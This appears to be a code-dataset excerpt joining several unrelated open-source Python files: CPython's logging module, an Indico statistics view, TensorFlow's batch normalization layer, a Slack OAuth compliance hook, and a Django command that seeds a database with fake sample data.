                self.handlers.remove(hdlr)
            finally:
                hdlr.release()
    def callHandlers(self, record):
        """
        Pass a record to all relevant handlers.

        Loop through all handlers for this logger and its parents in the
        logger hierarchy. If no handler was found, output a one-off error
        message to sys.stderr. Stop searching up the hierarchy whenever a
        logger with the "propagate" attribute set to zero is found - that
        will be the last logger whose handlers are called.
        """
        c = self
        found = 0   # counts handlers seen, regardless of their level
        while c:
            for hdlr in c.handlers:
                found = found + 1
                if record.levelno >= hdlr.level:
                    hdlr.handle(record)
            if not c.propagate:
                c = None    #break out
            else:
                c = c.parent
        if (found == 0) and raiseExceptions and not self.manager.emittedNoHandlerWarning:
            sys.stderr.write("No handlers could be found for logger"
                             " \"%s\"\n" % self.name)
            self.manager.emittedNoHandlerWarning = 1
    def getEffectiveLevel(self):
        """
        Get the effective level for this logger.

        Loop through this logger and its parents in the logger hierarchy,
        looking for a non-zero logging level. Return the first one found.
        """
        logger = self
        while logger:
            if logger.level:
                return logger.level
            logger = logger.parent
        return NOTSET
    def isEnabledFor(self, level):
        """
        Is this logger enabled for level 'level'?
        """
        # manager.disable is a hierarchy-wide cutoff (see Manager.__init__).
        if self.manager.disable >= level:
            return 0
        return level >= self.getEffectiveLevel()
class RootLogger(Logger):
    """
    A root logger is not that different to any other logger, except that
    it must have a logging level and there is only one instance of it in
    the hierarchy.
    """
    def __init__(self, level):
        """
        Initialize the logger with the name "root".
        """
        Logger.__init__(self, "root", level)

# Install Logger as the default logger class used by Manager.getLogger();
# user code may replace it via setLoggerClass().
_loggerClass = Logger
class LoggerAdapter:
    """
    An adapter for loggers which makes it easier to specify contextual
    information in logging output.
    """
    def __init__(self, logger, extra):
        """
        Initialize the adapter with a logger and a dict-like object which
        provides contextual information. This constructor signature allows
        easy stacking of LoggerAdapters, if so desired.

        You can effectively pass keyword arguments as shown in the
        following example:

        adapter = LoggerAdapter(someLogger, dict(p1=v1, p2="v2"))
        """
        self.logger = logger
        self.extra = extra

    def process(self, msg, kwargs):
        """
        Inject contextual information into a logging call, returning the
        (possibly modified) message and keyword arguments. The default
        implementation stores this adapter's 'extra' dict under the
        'extra' keyword. Override this single method in a subclass to
        customize what context is attached.
        """
        kwargs["extra"] = self.extra
        return msg, kwargs

    def debug(self, msg, *args, **kwargs):
        """Delegate a debug call to the underlying logger with context added."""
        processed_msg, processed_kwargs = self.process(msg, kwargs)
        self.logger.debug(processed_msg, *args, **processed_kwargs)

    def info(self, msg, *args, **kwargs):
        """Delegate an info call to the underlying logger with context added."""
        processed_msg, processed_kwargs = self.process(msg, kwargs)
        self.logger.info(processed_msg, *args, **processed_kwargs)

    def warning(self, msg, *args, **kwargs):
        """Delegate a warning call to the underlying logger with context added."""
        processed_msg, processed_kwargs = self.process(msg, kwargs)
        self.logger.warning(processed_msg, *args, **processed_kwargs)

    def error(self, msg, *args, **kwargs):
        """Delegate an error call to the underlying logger with context added."""
        processed_msg, processed_kwargs = self.process(msg, kwargs)
        self.logger.error(processed_msg, *args, **processed_kwargs)

    def exception(self, msg, *args, **kwargs):
        """
        Delegate an exception call to the underlying logger with context
        added; the call is forwarded as an error with exc_info set.
        """
        processed_msg, processed_kwargs = self.process(msg, kwargs)
        processed_kwargs["exc_info"] = 1
        self.logger.error(processed_msg, *args, **processed_kwargs)

    def critical(self, msg, *args, **kwargs):
        """Delegate a critical call to the underlying logger with context added."""
        processed_msg, processed_kwargs = self.process(msg, kwargs)
        self.logger.critical(processed_msg, *args, **processed_kwargs)

    def log(self, level, msg, *args, **kwargs):
        """Delegate a log call to the underlying logger with context added."""
        processed_msg, processed_kwargs = self.process(msg, kwargs)
        self.logger.log(level, processed_msg, *args, **processed_kwargs)
# The single module-level root logger, shared by the convenience
# functions below (debug(), info(), ...).
root = RootLogger(WARNING)
Logger.root = root
Logger.manager = Manager(Logger.root)
#---------------------------------------------------------------------------
# Configuration classes and functions
#---------------------------------------------------------------------------
# Default format string used by basicConfig() when none is supplied.
BASIC_FORMAT = "%(levelname)s:%(name)s:%(message)s"
def basicConfig(**kwargs):
    """
    Do basic configuration for the logging system.

    This is a no-op if the root logger already has handlers configured.
    It is a convenience method intended for use by simple scripts to do
    one-shot configuration of the logging package.

    By default, a StreamHandler writing to sys.stderr is created, given
    a formatter using the BASIC_FORMAT format string, and added to the
    root logger.

    Optional keyword arguments:

    filename  Create a FileHandler using the specified filename, rather
              than a StreamHandler.
    filemode  Mode used to open the file when filename is given
              (defaults to 'a').
    format    Format string for the handler.
    datefmt   Date/time format string.
    level     Set the root logger level.
    stream    Stream used to initialize the StreamHandler. Incompatible
              with 'filename' - if both are present, 'stream' is
              ignored.

    A stream created with open(filename, mode) may be passed as
    'stream'; note however that StreamHandler never closes its stream
    (it may be sys.stdout or sys.stderr) whereas FileHandler closes its
    file when the handler is closed.
    """
    if len(root.handlers) != 0:
        # Already configured - leave everything untouched.
        return
    filename = kwargs.get("filename")
    if filename:
        handler = FileHandler(filename, kwargs.get("filemode", 'a'))
    else:
        handler = StreamHandler(kwargs.get("stream"))
    handler.setFormatter(Formatter(kwargs.get("format", BASIC_FORMAT),
                                   kwargs.get("datefmt", None)))
    root.addHandler(handler)
    level = kwargs.get("level")
    if level is not None:
        if str(level) == level:  # If a string was passed, do more checks
            if level not in _levelNames:
                raise ValueError("Unknown level: %r" % level)
            level = _levelNames[level]
        root.setLevel(level)
#---------------------------------------------------------------------------
# Utility functions at module level.
# Basically delegate everything to the root logger.
#---------------------------------------------------------------------------
def getLogger(name=None):
    """
    Return a logger with the specified name, creating it if necessary.

    If no name is specified, return the root logger.
    """
    if not name:
        return root
    return Logger.manager.getLogger(name)
#def getRootLogger():
# """
# Return the root logger.
#
# Note that getLogger('') now does the same thing, so this function is
# deprecated and may disappear in the future.
# """
# return root
def critical(msg, *args, **kwargs):
    """
    Log a message with severity 'CRITICAL' on the root logger.

    Calls basicConfig() first if the root logger has no handlers yet.
    """
    if not root.handlers:
        basicConfig()
    root.critical(msg, *args, **kwargs)

# Backwards-compatible alias.
fatal = critical
def error(msg, *args, **kwargs):
    """
    Log a message with severity 'ERROR' on the root logger.

    Calls basicConfig() first if the root logger has no handlers yet.
    """
    if not root.handlers:
        basicConfig()
    root.error(msg, *args, **kwargs)
def exception(msg, *args, **kwargs):
    """
    Log a message with severity 'ERROR' on the root logger, with
    exception information.

    Intended to be called from an exception handler: exc_info is forced
    so the active exception is attached to the record.  The **kwargs
    pass-through makes the signature consistent with the other
    module-level helpers (error(), warning(), ...), which all accept
    keyword arguments such as 'extra'; previously any keyword argument
    raised a TypeError.
    """
    kwargs["exc_info"] = 1
    error(msg, *args, **kwargs)
def warning(msg, *args, **kwargs):
    """
    Log a message with severity 'WARNING' on the root logger.

    Calls basicConfig() first if the root logger has no handlers yet.
    """
    if not root.handlers:
        basicConfig()
    root.warning(msg, *args, **kwargs)

# Backwards-compatible alias.
warn = warning
def info(msg, *args, **kwargs):
    """
    Log a message with severity 'INFO' on the root logger.

    Calls basicConfig() first if the root logger has no handlers yet.
    """
    if not root.handlers:
        basicConfig()
    root.info(msg, *args, **kwargs)
def debug(msg, *args, **kwargs):
    """
    Log a message with severity 'DEBUG' on the root logger.

    Calls basicConfig() first if the root logger has no handlers yet.
    """
    if not root.handlers:
        basicConfig()
    root.debug(msg, *args, **kwargs)
def log(level, msg, *args, **kwargs):
    """
    Log 'msg % args' with the integer severity 'level' on the root
    logger.

    Calls basicConfig() first if the root logger has no handlers yet.
    """
    if not root.handlers:
        basicConfig()
    root.log(level, msg, *args, **kwargs)
def disable(level):
    """
    Disable all logging calls less severe than 'level'.

    Sets the manager-wide threshold that Logger.isEnabledFor() checks
    before anything is processed.
    """
    root.manager.disable = level
def shutdown(handlerList=_handlerList):
    """
    Perform any cleanup actions in the logging system (e.g. flushing
    buffers).

    Should be called at application exit.
    """
    # Iterate over a copy: closing a handler may mutate the list.
    for handler in handlerList[:]:
        try:
            handler.flush()
            handler.close()
        except:
            # Errors might occur, for example, if files are locked; we
            # swallow them unless raiseExceptions is set.
            if raiseExceptions:
                raise
#Let's try and shutdown automatically on application exit...
try:
    import atexit
    atexit.register(shutdown)
except ImportError: # for Python versions < 2.0
    # Fallback: wrap sys.exit so shutdown() still runs on exit.
    def exithook(status, old_exit=sys.exit):
        try:
            shutdown()
        finally:
            old_exit(status)
    sys.exit = exithook
# Null handler
class NullHandler(Handler):
    """
    This handler does nothing. It's intended to be used to avoid the
    "No handlers could be found for logger XXX" one-off warning. This is
    important for library code, which may contain code to log events. If a user
    of the library does not configure logging, the one-off warning might be
    produced; to avoid this, the library developer simply needs to instantiate
    a NullHandler and add it to the top-level logger of the library module or
    package.
    """
    def emit(self, record):
        # Deliberately discard the record.
        pass
# Warnings integration
# Holds the original warnings.showwarning function while capture is
# active (see captureWarnings()); None when warnings are not redirected.
_warnings_showwarning = None
def _showwarning(message, category, filename, lineno, file=None, line=None):
    """
    Implementation of showwarnings which redirects to logging.

    If a file is specified, delegate to the original warnings
    implementation of showwarning (if any).  Otherwise, format the
    warning with warnings.formatwarning and log the resulting string to
    a warnings logger named "py.warnings" with level logging.WARNING.
    """
    if file is None:
        formatted = warnings.formatwarning(message, category, filename,
                                           lineno, line)
        warn_logger = getLogger("py.warnings")
        if not warn_logger.handlers:
            # Avoid the "no handlers could be found" one-off warning.
            warn_logger.addHandler(NullHandler())
        warn_logger.warning("%s", formatted)
    elif _warnings_showwarning is not None:
        _warnings_showwarning(message, category, filename, lineno, file,
                              line)
def captureWarnings(capture):
    """
    If capture is true, redirect all warnings to the logging package.

    If capture is False, ensure that warnings are not redirected to
    logging but to their original destinations.
    """
    global _warnings_showwarning
    if capture and _warnings_showwarning is None:
        # Remember the original hook so it can be restored later.
        _warnings_showwarning = warnings.showwarning
        warnings.showwarning = _showwarning
    elif not capture and _warnings_showwarning is not None:
        warnings.showwarning = _warnings_showwarning
        _warnings_showwarning = None
| MalloyPower/parsing-python | front-end/testsuite-python-lib/Python-3.1/Lib/logging/__init__.py | Python | mit | 55,162 |
# This file is part of Indico.
# Copyright (C) 2002 - 2015 European Organization for Nuclear Research (CERN).
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# Indico is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Indico; if not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
from MaKaC.webinterface.pages.base import WPJinjaMixin
from MaKaC.webinterface.pages.category import WPCategoryDisplayBase
from MaKaC.webinterface.wcomponents import WSimpleNavigationDrawer
class WPCategoryStatistics(WPJinjaMixin, WPCategoryDisplayBase):
    """Display page for category statistics, rendered via Jinja."""
    # Prefix prepended to template names resolved by WPJinjaMixin.
    template_prefix = 'categories/'
    def _getBody(self, params):
        # Delegate body rendering to the Jinja-based page-content helper.
        return self._getPageContent(params)
    def _getNavigationDrawer(self):
        # Breadcrumb drawer showing the category name, typed "Statistics".
        return WSimpleNavigationDrawer(self._target.getName(), type='Statistics')
    def getJSFiles(self):
        # Base scripts plus jqPlot and the statistics-specific bundles.
        return (WPCategoryDisplayBase.getJSFiles(self) + self._includeJSPackage('jqplot_js', prefix='')
                + self._asset_env['statistics_js'].urls() + self._asset_env['modules_category_statistics_js'].urls())
    def getCSSFiles(self):
        # Base stylesheets plus the jqPlot stylesheet.
        return WPCategoryDisplayBase.getCSSFiles(self) + self._asset_env['jqplot_css'].urls()
| XeCycle/indico | indico/modules/categories/views.py | Python | gpl-3.0 | 1,629 |
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
# pylint: disable=unused-import,g-bad-import-order
"""Contains the normalization layer classes and their functional aliases.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import six
from six.moves import xrange # pylint: disable=redefined-builtin
import numpy as np
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import standard_ops
from tensorflow.python.ops import variable_scope as vs
from tensorflow.python.training import moving_averages
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import variables
from tensorflow.python.layers import base
from tensorflow.python.layers import utils
class BatchNormalization(base._Layer):  # pylint: disable=protected-access
  """Batch Normalization layer from http://arxiv.org/abs/1502.03167.

  "Batch Normalization: Accelerating Deep Network Training by Reducing
  Internal Covariate Shift"

  Sergey Ioffe, Christian Szegedy

  Arguments:
    axis: Integer, the axis that should be normalized (typically the features
      axis). For instance, after a `Convolution2D` layer with
      `data_format="channels_first"`, set `axis=1` in `BatchNormalization`.
    momentum: Momentum for the moving average.
    epsilon: Small float added to variance to avoid dividing by zero.
    center: If True, add offset of `beta` to normalized tensor. If False, `beta`
      is ignored.
    scale: If True, multiply by `gamma`. If False, `gamma` is
      not used. When the next layer is linear (also e.g. `nn.relu`), this can be
      disabled since the scaling can be done by the next layer.
    beta_initializer: Initializer for the beta weight.
    gamma_initializer: Initializer for the gamma weight.
    moving_mean_initializer: Initializer for the moving mean.
    moving_variance_initializer: Initializer for the moving variance.
    beta_regularizer: Optional regularizer for the beta weight.
    gamma_regularizer: Optional regularizer for the gamma weight.
    trainable: Boolean, if `True` also add variables to the graph collection
      `GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
    name: A string, the name of the layer.
  """

  def __init__(self,
               axis=-1,
               momentum=0.99,
               epsilon=1e-3,
               center=True,
               scale=True,
               beta_initializer=init_ops.zeros_initializer(),
               gamma_initializer=init_ops.ones_initializer(),
               moving_mean_initializer=init_ops.zeros_initializer(),
               moving_variance_initializer=init_ops.ones_initializer(),
               beta_regularizer=None,
               gamma_regularizer=None,
               trainable=True,
               name=None,
               **kwargs):
    super(BatchNormalization, self).__init__(
        name=name, trainable=trainable, **kwargs)
    self.axis = axis
    self.momentum = momentum
    self.epsilon = epsilon
    self.center = center
    self.scale = scale
    self.beta_initializer = beta_initializer
    self.gamma_initializer = gamma_initializer
    self.moving_mean_initializer = moving_mean_initializer
    self.moving_variance_initializer = moving_variance_initializer
    self.beta_regularizer = beta_regularizer
    self.gamma_regularizer = gamma_regularizer

  def build(self, input_shape):
    """Creates beta/gamma and the moving statistics for the given shape."""
    input_shape = tensor_shape.TensorShape(input_shape)
    if not input_shape.ndims:
      raise ValueError('Input has undefined rank:', input_shape)
    ndim = len(input_shape)
    # Resolve a possibly-negative `axis` to its positive index and
    # validate it against the input rank.
    if self.axis < 0:
      axis = ndim + self.axis
    else:
      axis = self.axis
    if axis < 0 or axis >= ndim:
      raise ValueError('Value of `axis` argument ' + str(self.axis) +
                       ' is out of range for input with rank ' + str(ndim))
    param_dim = input_shape[axis]
    if not param_dim.value:
      raise ValueError('Input has undefined `axis` dimension. Input shape: ',
                       input_shape)
    if self.center:
      self.beta = vs.get_variable('beta',
                                  shape=(param_dim,),
                                  initializer=self.beta_initializer,
                                  regularizer=self.beta_regularizer,
                                  trainable=True)
    else:
      self.beta = None
    if self.scale:
      self.gamma = vs.get_variable('gamma',
                                   shape=(param_dim,),
                                   initializer=self.gamma_initializer,
                                   regularizer=self.gamma_regularizer,
                                   trainable=True)
    else:
      self.gamma = None
    # Disable variable partitioning when creating the moving mean and variance
    partitioner = vs.get_variable_scope().partitioner
    try:
      vs.get_variable_scope().set_partitioner(None)
      self.moving_mean = vs.get_variable(
          'moving_mean',
          shape=(param_dim,),
          initializer=self.moving_mean_initializer,
          trainable=False)
      self.moving_variance = vs.get_variable(
          'moving_variance',
          shape=(param_dim,),
          initializer=self.moving_variance_initializer,
          trainable=False)
    finally:
      vs.get_variable_scope().set_partitioner(partitioner)

  def call(self, inputs, training=False):
    # First, compute the axes along which to reduce the mean / variance,
    # as well as the broadcast shape to be used for all parameters.
    input_shape = inputs.get_shape()
    ndim = len(input_shape)
    reduction_axes = list(range(len(input_shape)))
    del reduction_axes[self.axis]
    broadcast_shape = [1] * len(input_shape)
    broadcast_shape[self.axis] = input_shape[self.axis].value

    # Determines whether broadcasting is needed.
    # BUG FIX: on Python 3, `range()` returns a lazy `range` object and a
    # list never compares equal to it, so the previous comparison
    # `sorted(reduction_axes) != range(ndim)[:-1]` was always True there,
    # forcing the slower explicit-broadcast path for every input.
    # Materializing the expected axes as a list behaves identically on
    # Python 2 and correctly on Python 3.
    needs_broadcasting = (sorted(reduction_axes) != list(range(ndim))[:-1])

    # Determine a boolean value for `training`: could be True, False, or None.
    training_value = utils.constant_value(training)

    if needs_broadcasting:
      # In this case we must explicitly broadcast all parameters.
      if self.center:
        broadcast_beta = array_ops.reshape(self.beta, broadcast_shape)
      else:
        broadcast_beta = None
      if self.scale:
        broadcast_gamma = array_ops.reshape(self.gamma, broadcast_shape)
      else:
        broadcast_gamma = None

    if training_value is not False:
      # Compute batch statistics (only needed when training may happen).
      if needs_broadcasting:
        broadcast_mean, broadcast_variance = nn.moments(
            inputs, reduction_axes, keep_dims=True)
        mean = array_ops.reshape(broadcast_mean, [-1])
        variance = array_ops.reshape(broadcast_variance, [-1])
      else:
        mean, variance = nn.moments(inputs, reduction_axes)

      # Prepare updates if necessary.
      if not self.updates:
        mean_update = moving_averages.assign_moving_average(
            self.moving_mean, mean, self.momentum, zero_debias=False)
        variance_update = moving_averages.assign_moving_average(
            self.moving_variance, variance, self.momentum, zero_debias=False)
        # In the future this should be refactored into a self.add_update
        # methods in order to allow for instance-based BN layer sharing
        # across unrelated input streams (e.g. like in Keras).
        self.updates.append(mean_update)
        self.updates.append(variance_update)

    # Normalize batch. We do this inside separate functions for training
    # and inference so as to avoid evaluating both branches.
    def normalize_in_test():
      if needs_broadcasting:
        broadcast_moving_mean = array_ops.reshape(self.moving_mean,
                                                  broadcast_shape)
        broadcast_moving_variance = array_ops.reshape(self.moving_variance,
                                                      broadcast_shape)
        return nn.batch_normalization(inputs,
                                      broadcast_moving_mean,
                                      broadcast_moving_variance,
                                      broadcast_beta,
                                      broadcast_gamma,
                                      self.epsilon)
      else:
        return nn.batch_normalization(inputs,
                                      self.moving_mean,
                                      self.moving_variance,
                                      self.beta if self.center else None,
                                      self.gamma if self.scale else None,
                                      self.epsilon)

    def normalize_in_training():
      if needs_broadcasting:
        return nn.batch_normalization(inputs,
                                      broadcast_mean,
                                      broadcast_variance,
                                      broadcast_beta,
                                      broadcast_gamma,
                                      self.epsilon)
      else:
        return nn.batch_normalization(inputs,
                                      mean,
                                      variance,
                                      self.beta if self.center else None,
                                      self.gamma if self.scale else None,
                                      self.epsilon)

    return utils.smart_cond(training,
                            normalize_in_training,
                            normalize_in_test)
def batch_normalization(inputs,
                        axis=-1,
                        momentum=0.99,
                        epsilon=1e-3,
                        center=True,
                        scale=True,
                        beta_initializer=init_ops.zeros_initializer(),
                        gamma_initializer=init_ops.ones_initializer(),
                        moving_mean_initializer=init_ops.zeros_initializer(),
                        moving_variance_initializer=init_ops.ones_initializer(),
                        beta_regularizer=None,
                        gamma_regularizer=None,
                        training=False,
                        trainable=True,
                        name=None,
                        reuse=None):
  """Functional interface for the batch normalization layer.

  Builds a `BatchNormalization` layer object and immediately applies it
  to `inputs`.

  Reference: http://arxiv.org/abs/1502.03167

  "Batch Normalization: Accelerating Deep Network Training by Reducing
  Internal Covariate Shift"

  Sergey Ioffe, Christian Szegedy

  Arguments:
    inputs: Tensor input.
    axis: Integer, the axis that should be normalized (typically the features
      axis). For instance, after a `Convolution2D` layer with
      `data_format="channels_first"`, set `axis=1` in `BatchNormalization`.
    momentum: Momentum for the moving average.
    epsilon: Small float added to variance to avoid dividing by zero.
    center: If True, add offset of `beta` to normalized tensor. If False, `beta`
      is ignored.
    scale: If True, multiply by `gamma`. If False, `gamma` is
      not used. When the next layer is linear (also e.g. `nn.relu`), this can be
      disabled since the scaling can be done by the next layer.
    beta_initializer: Initializer for the beta weight.
    gamma_initializer: Initializer for the gamma weight.
    moving_mean_initializer: Initializer for the moving mean.
    moving_variance_initializer: Initializer for the moving variance.
    beta_regularizer: Optional regularizer for the beta weight.
    gamma_regularizer: Optional regularizer for the gamma weight.
    training: Either a Python boolean, or a TensorFlow boolean scalar tensor
      (e.g. a placeholder). Whether to return the output in training mode
      (normalized with statistics of the current batch) or in inference mode
      (normalized with moving statistics).
    trainable: Boolean, if `True` also add variables to the graph collection
      `GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
    name: String, the name of the layer.
    reuse: Boolean, whether to reuse the weights of a previous layer
      by the same name.

  Returns:
    Output tensor.
  """
  bn_layer = BatchNormalization(axis=axis,
                                momentum=momentum,
                                epsilon=epsilon,
                                center=center,
                                scale=scale,
                                beta_initializer=beta_initializer,
                                gamma_initializer=gamma_initializer,
                                moving_mean_initializer=moving_mean_initializer,
                                moving_variance_initializer=(
                                    moving_variance_initializer),
                                beta_regularizer=beta_regularizer,
                                gamma_regularizer=gamma_regularizer,
                                trainable=trainable,
                                name=name,
                                _reuse=reuse,
                                _scope=name)
  return bn_layer.apply(inputs, training=training)
# Aliases
# Shorter names kept for convenience / consistency with other APIs.
BatchNorm = BatchNormalization
batch_norm = batch_normalization
| anilmuthineni/tensorflow | tensorflow/python/layers/normalization.py | Python | apache-2.0 | 13,621 |
try:
from urlparse import urlparse, parse_qs
except ImportError:
from urllib.parse import urlparse, parse_qs
from oauthlib.common import add_params_to_uri
def slack_compliance_fix(session):
    """Register a hook that injects Slack's non-standard ``token`` parameter.

    Slack expects the OAuth access token as a ``token`` request
    parameter.  The registered "protected_request" hook adds
    ``session.access_token`` unless the caller already supplied a token
    in the URL query string or in the data dict (an explicit token is
    assumed to deliberately override the session's one).
    Returns the session, for chaining.
    """
    def _non_compliant_param_name(url, headers, data):
        # A token explicitly provided by the caller wins; leave the
        # request untouched in that case.
        query_params = dict(parse_qs(urlparse(url).query))
        explicit_token = query_params.get("token")
        if not explicit_token and isinstance(data, dict):
            explicit_token = data.get("token")
        if explicit_token:
            return url, headers, data
        if not data:
            data = {"token": session.access_token}
        elif isinstance(data, dict):
            data["token"] = session.access_token
        else:
            # ``data`` is something other than a dict (maybe a stream or
            # a file object); we cannot easily modify it, so append the
            # token to the URL instead.
            url = add_params_to_uri(url, [("token", session.access_token)])
        return url, headers, data

    session.register_compliance_hook("protected_request", _non_compliant_param_name)
    return session
| singingwolfboy/requests-oauthlib | requests_oauthlib/compliance_fixes/slack.py | Python | isc | 1,453 |
import random
import urllib
from os import path, makedirs
from faker import Faker
from django.conf import settings # import the settings file
from django.core.management.base import BaseCommand
from Lagerregal import utils
from devices.models import Building, Room, Manufacturer, Device, Picture, Lending
from devicegroups.models import Devicegroup
from devicetypes.models import Type
from locations.models import Section
from users.models import Lageruser, Department, DepartmentUser
fake = Faker('de_DE')
def fake_building(word):
    """Build an unsaved Building named after *word*, with a fake address."""
    return Building(
        name=word.title(),
        street=fake.street_name(),
        number=fake.random.randint(1, 200),
        zipcode=fake.postcode(),
        city=fake.city(),
        state=fake.state(),
        country=fake.country()
    )
def fake_section(word):
    """Build an unsaved Section named after *word*."""
    return Section(name=word.title())
def fake_room(word):
    """Build an unsaved Room in a random existing building and section."""
    return Room(
        name=word.title(),
        building=Building.objects.order_by('?').first(),
        section=Section.objects.order_by('?').first()
    )
def fake_manufacturer():
    """Build an unsaved Manufacturer with a fake company name."""
    return Manufacturer(name=fake.company())
def fake_department(word):
    """Build an unsaved Department named after *word*."""
    return Department(name=word.title())
def fake_lageruser(word):
    """Build an unsaved Lageruser with *word* as username and a fake name."""
    return Lageruser(
        main_department=Department.objects.order_by('?').first(),
        username=word,
        first_name=fake.first_name(),
        last_name=fake.last_name()
    )
def fake_devicetype(word):
    """Build an unsaved device Type named after *word*."""
    return Type(name=word.title())
def fake_devicegroup(word):
    """Build an unsaved Devicegroup in a random existing department."""
    return Devicegroup(
        name=word.title(),
        department=Department.objects.order_by('?').first()
    )
def fake_device(inventorynumber, word):
    """Build an unsaved Device with random relations to existing records."""
    return Device(
        created_at=fake.past_date(start_date="-600d"),
        creator=Lageruser.objects.order_by('?').first(),
        name=word.title(),
        inventorynumber=inventorynumber,
        serialnumber=random.randint(1, 1000),
        manufacturer=Manufacturer.objects.order_by('?').first(),
        devicetype=Type.objects.order_by('?').first(),
        room=Room.objects.order_by('?').first(),
        group=Devicegroup.objects.order_by('?').first(),
        department=Department.objects.order_by('?').first()
    )
def fake_lending(device, user):
    """Build an unsaved Lending of *device* (or a small device) to *user*.

    Roughly a quarter of lendings stay open with a future due date; the
    rest get a past return date.  A further ~20% record a free-text
    "small device" instead of referencing *device* itself.
    """
    new_lending = Lending(
        owner=user,
        lenddate=fake.date_between(start_date='-100d', end_date='-50d')
    )
    # ~25%: still open, due in the future; otherwise already returned.
    if random.randint(0, 100) > 75:
        new_lending.duedate = fake.future_date(end_date='+50d')
    else:
        new_lending.returndate = fake.date_between(start_date='-50d', end_date='today')
    # ~20%: an untracked small device instead of a Device record.
    if random.randint(0, 100) > 80:
        new_lending.smalldevice = fake.word()
    else:
        new_lending.device = device
    return new_lending
def generate_buildings(number):
    """Create *number* buildings with unique fake names."""
    print("Generating buildings")
    word_list = fake.words(number, unique=True)
    Building.objects.bulk_create(fake_building(word) for word in word_list)
def generate_sections(number):
    """Create *number* sections with unique fake names."""
    print("Generating sections")
    word_list = fake.words(number, unique=True)
    Section.objects.bulk_create(fake_section(word) for word in word_list)
def generate_rooms(number):
    """Create *number* rooms; buildings/sections must already exist."""
    print("Generating rooms")
    word_list = fake.words(number, unique=True)
    Room.objects.bulk_create(fake_room(word) for word in word_list)
def generate_manufacturers(number):
    """Create *number* manufacturers with fake company names."""
    print("Generating manufacturers")
    Manufacturer.objects.bulk_create(fake_manufacturer() for i in range(number))
def generate_departments(number):
    """Create *number* departments with unique fake names."""
    print("Generating departments")
    word_list = fake.words(number, unique=True)
    Department.objects.bulk_create(fake_department(word) for word in word_list)
def generate_lagerusers(number):
    """Create *number* users; departments must already exist."""
    print("Generating lagerusers")
    word_list = fake.words(number, unique=True)
    Lageruser.objects.bulk_create(fake_lageruser(word) for word in word_list)
def generate_department_users():
    """Link every user with a main department to that department."""
    print("Generating departmentusers")
    users = Lageruser.objects.all()
    for user in users:
        if user.main_department:
            DepartmentUser.objects.create(user=user, department=user.main_department)
def generate_devicetypes(number):
    """Create *number* device types with unique fake names."""
    print("Generating devicetypes")
    word_list = fake.words(number, unique=True)
    Type.objects.bulk_create(fake_devicetype(word) for word in word_list)
def generate_devicegroups(number):
    """Create *number* device groups; departments must already exist."""
    print("Generating devicegroups")
    word_list = fake.words(number, unique=True)
    Devicegroup.objects.bulk_create(fake_devicegroup(word) for word in word_list)
def generate_devices(number):
    """Create *number* devices with unique inventory numbers and names."""
    print("Generating devices")
    # Sampling without replacement keeps inventory numbers unique.
    inventorynumber_list = random.sample(range(0, 5000), number)
    word_list = fake.words(number, unique=True)
    Device.objects.bulk_create(fake_device(inventorynumber_list[i], word_list[i]) for i in range(number))
def generate_lendings(number):
    """Create *number* lendings, each for a distinct device and user."""
    print("Generating lendings")
    devices = random.sample(list(Device.objects.all()), number)
    users = random.sample(list(Lageruser.objects.all()), number)
    for i in range(number):
        lending = fake_lending(devices[i], users[i])
        lending.save()
        # Only lendings that reference an actual Device (not a
        # free-text small device) mark that device as currently lent.
        if lending.device:
            devices[i].currentlending = lending
            devices[i].save()
def generate_pictures(number):
    """
    Every device gets one picture, but we only download a few unique images and
    recycle after that. Try to be as dynamic as possible and share state through
    settings.PRODUCTION with get_file_location so we do not get a uuid
    every time we save a fake image.
    """
    print("Generating pictures")
    devices = Device.objects.all()
    img_root = path.join(settings.MEDIA_ROOT, utils.get_file_location(Picture()))
    # Download at most <number> placeholder images; cached files are kept.
    # NOTE(review): lorempixel.com has been shut down for years, so this
    # download will most likely fail nowadays - consider replacing it
    # with another placeholder-image service.
    for i in range(number):
        img_path = path.join(img_root, 'dev_{:03}.png'.format(i))
        if not path.exists(img_path):
            makedirs(path.dirname(img_path), exist_ok=True)
            urllib.request.urlretrieve("https://lorempixel.com/640/480/technics", img_path)
    for index, device in enumerate(devices):
        pic = Picture(device=device)
        # recycle images after <number> uses
        pic.image = utils.get_file_location(pic, 'dev_{:03}.png'.format(index % number))
        pic.save()
class Command(BaseCommand):
    """Management command that fills an empty database with sample data."""
    help = 'Populate database with sample data.'
    err = SystemExit("can't create sample data in production mode")
    # Import-time guard: abort when settings.PRODUCTION is truthy, and
    # also when the PRODUCTION setting is missing entirely (the
    # AttributeError branch re-raises the same SystemExit).
    try:
        if settings.PRODUCTION:
            raise err
    except AttributeError:
        raise err
    def handle(self, *args, **options):
        # Only populate a pristine database; existing buildings are taken
        # as evidence that data is already present.
        if Building.objects.exists():
            print("It looks like your database already contains objects. Skipping…")
        else:
            # Order matters: later generators pick random rows created by
            # earlier ones (rooms need buildings/sections, devices need
            # users/types/rooms/groups, ...).
            generate_buildings(20)
            generate_sections(20)
            generate_rooms(20)
            generate_manufacturers(5)
            generate_departments(5)
            generate_lagerusers(50)
            generate_department_users()
            generate_devicetypes(10)
            generate_devicegroups(10)
            generate_devices(150)
            generate_lendings(30)
            generate_pictures(20)
